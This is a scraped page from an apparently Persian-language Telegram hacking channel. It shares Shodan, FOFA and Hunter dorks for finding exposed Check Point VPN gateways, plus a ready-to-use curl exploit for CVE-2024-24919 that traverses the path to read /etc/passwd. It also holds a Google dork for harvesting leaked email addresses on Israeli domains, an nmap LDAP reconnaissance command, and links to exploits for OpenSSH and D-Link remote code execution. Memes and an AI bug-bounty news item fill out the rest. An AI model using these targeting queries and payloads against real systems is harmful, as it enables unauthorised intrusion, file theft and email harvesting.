NEW BOT Телеграм, страница

CVE-2024–24919

. Dorks

Hunter: /product.name="Check Point SSL Network Extender"

FOFA: noscript="Check Point SSL Network Extender"

SHODAN: http.noscript="Check Point SSL Network Extender"

@matitanium

453 viewsMatin Nouriyan, edited 18:07

CyberSecurity

CVE-2024–24919 . Dorks Hunter: /product.name="Check Point SSL Network Extender" FOFA: noscript="Check Point SSL Network Extender" SHODAN: http.noscript="Check Point SSL Network Extender" @matitanium

Exploit

curl -k -X POST "https://{ip}/clients/MyCRL" \  -H "Host: {ip}/" \  -H "User-Agent: Mozilla/5.0 (Macintosh:@Matitanium; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0" \  -H "Te: trailers" \  -H "Dnt: 1" \  -H "Connection: keep-alive" \  -H "Content-Length: 48" \  --data "aCSHELL/../../../../../../../../../../../etc/passwd"

525 viewsMatin Nouriyan, edited 18:08

CyberSecurity

Google dork for email leak 📝

intext:@"yahoo|gmail|hotmail".com filetype:txt site:*.il

@matitanium

489 viewsMatin Nouriyan, edited 18:13

CyberSecurity

استفاده از NMAP برای برسی ساختار AD و Domain

دامین کنترل رو پورت اسکن کنید و پروتکل LDAP رو پیدا کنید
معمولا پورت 389

کامند استفاده شده:

nmap -p389 -sV -n — noscript ldap-rootdse <DC-IP>

@matitanium

👌4👎1

545 viewsMatin Nouriyan, edited 18:29

CyberSecurity

CVE-2024-6387
Remote Unauthenticated Code Execution Vulnerability in OpenSSH server

#version
SSH-2.0-OpenSSH_8.9p1
Ubuntu-3ubuntu0.10

فقط روی SSH سرور ها با معماری 32 بیت قابل اجرا هستش

#Exploit

https://github.com/asterictnl-lvdw/CVE-2024-6387

@matitanium

GitHub

GitHub - Karmakstylez/CVE-2024-6387: Remote Unauthenticated Code Execution Vulnerability in OpenSSH server (CVE-2024-6387)

Remote Unauthenticated Code Execution Vulnerability in OpenSSH server (CVE-2024-6387) - Karmakstylez/CVE-2024-6387

👍3

797 viewsMatin Nouriyan, edited 10:12

CyberSecurity

0:20

This media is not supported in your browser

VIEW IN TELEGRAM

کلی از سازمان ها اینجوری فایروال کانفیگ میکنن 😂😂

تصور کنید سازمان ها از فایروال 2 سال پیش استفاده میکنن و اپدیت نشده

@matitanium

👍5😐3👌1🗿1

1.02K viewsMatin Nouriyan, edited 17:45

CyberSecurity

0:05

This media is not supported in your browser

VIEW IN TELEGRAM

مفهوم گلوگاه کارت گرافیک 😂

وقتی که حداکثر توان CPU بسیار کمتر از GPU هست و کارت گرافیک نمیتونه به حداکثر قدرتش برسه

@matitanium

👍4🔥1👌1

674 viewsMatin Nouriyan, 08:25

CyberSecurity

رایتاپ جدیدی که نوشتم رو دریابید

RCE via Java RMI Injection

https://link.medium.com/dbu6eVLb7Ob

Medium

RCE via JAVA RMI Injection

Hello friends,

❤5

689 viewsMatin Nouriyan, edited 20:13

CyberSecurity

CVE-2024-10914 : D-Link Network Attached Storage 'name'
DNS-3$versions - Unauthenticated OS Command Injection (RCE)
POC : https://github.com/redspy-sec/D-Link
@matitanium

624 viewsMatin Nouriyan, edited 07:58

CyberSecurity

#خبر
‼️ هوش مصنوعی در باگ بانتی !

اخیرا یک مدل هوش مصنوعی به نام XBOW به مدت ۳ ماه بر روی تارگت های واقعی در پلتفرم‌باگ بانتی هکروان فعالیت کرده است که توانسته در ranking/leader board هانتر های کشور آمریکا رتبه 11 را کسب کند !

طبق عکس هایی که خود تیم xbow در X منتشر کردند میتوانید خطرات آسیب پذیری های گزارش شده را در تصاویر مشاهده کنید که خیلی خوب است.

💬 بنظرتون هوش مصنوعی چه تغییراتی قراره در فیلد امنیت سایبری ایجاد کنه ؟ آیا قراره کلا تصاحب کنه و یا آیا قراره فیلد های امنیت جدید یا آسیب پذیری های جدیدی کشف بشوند ؟!

@matitanium

👍6

631 viewsMatin Nouriyan, 03:55

About

Blog

Apps

Platform